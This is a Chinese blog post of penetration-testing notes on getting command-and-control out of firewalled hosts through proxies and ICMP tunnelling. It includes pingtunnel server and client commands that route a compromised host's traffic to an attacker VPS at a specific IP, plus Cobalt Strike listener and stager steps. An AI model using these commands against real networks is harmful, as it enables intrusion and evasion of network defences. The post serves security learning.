内网渗透笔记之入站出站限制、隧道搭建

0x01知识点:

0、防火墙组策略对象

1、OSI 七层协议模型

2、正反向监听器说明

3、隧道技术分层协议

4、CS&MSF&控制上线

-隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网)

-代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)

#系列点:

1、判断什么时候用代理

2、判断什么时候用隧道

3、判断出网和不出网协议

4、如何使用代理建立节点并连接

5、如何使用隧道技术封装协议上线

6、判断哪些代理或隧道情况选择放弃


0x02单机-防火墙-限制端口出入站

熟悉常见主机配置不出网的方式

1、入站&出站&连接安全

这里没有设置规则,发现外联了一个IP地址,但是设置如下规则后就不能上线了。但是如果你用其他协议,不用tcp协议,也可以进行上线

主站出站TCP封杀,入站没有,无互联网

正向连接(取得一台有网络的权限,把数据传递给出网的机器,通过出网机器控制)

主站出站TCP封杀,入站没有,有互联网

正向连接(取得一台有网络的权限,把数据传递给出网的机器,通过出网机器控制)

隧道技术(走其他协议出网)

2、域&专用&公网&状态

3、阻止&允许&其他配置

0x03单机-防火墙-限制协议出入站

熟悉常见主机配置不出网的方式

1、程序&端口&预定义&自定义

2、协议&TCP&UDP&ICMP&L2TP 等

#域控-防火墙-组策略对象同步

熟悉常见主机配置不出网的操作流程

操作:组策略管理-域-创建 GPO 链接-防火墙设置

更新策略:强制&命令&重启

命令:gpupdate/force

#域控-防火墙-组策略不出网上线

背景介绍:域控通过组策略设置防火墙规则同步后,域内用户主机被限制 TCP 出网,其

中规则为出站规则,安全研究者通过入站取得 SHELL 权限,需要对其进行上线控制。

思路:正向连接&隧道技术

如果是入站被限制呢?反向连接&隧道技术也可以解决(前提看限制的多不多)

ICMP 协议项目:

https://github.com/esrrhs/spp

https://github.com/bdamele/icmpsh

https://github.com/esrrhs/pingtunnel

1、CS-ICMP-上线

被攻击主机发送出去的数据是ICMP,攻击者经过工具接收到的是TCP数据

注:以下隧道需要获得管理员权限

VPS:

./pingtunnel -type server

肉鸡:(管理器运行)

pingtunnel.exe -type client -l 127.0.0.1:5555 -s 82.157.166.165 -t 82.157.166.165:6666 -tcp 1 -noprint 1 -nolog 1

CS:

监听器 1:127.0.0.1 6666

监听器 2:192.168.46.66 7777

生成监听器 1 的 Stager 后门肉鸡执行

首先设置如下两个监听器:

选择该模块进行监听:

首先先在攻击机上建立会话

在远程主机下输入以下命令,并运行后门文件,可观察到已经上线(administrator权限)

评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

B10SS0MS

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值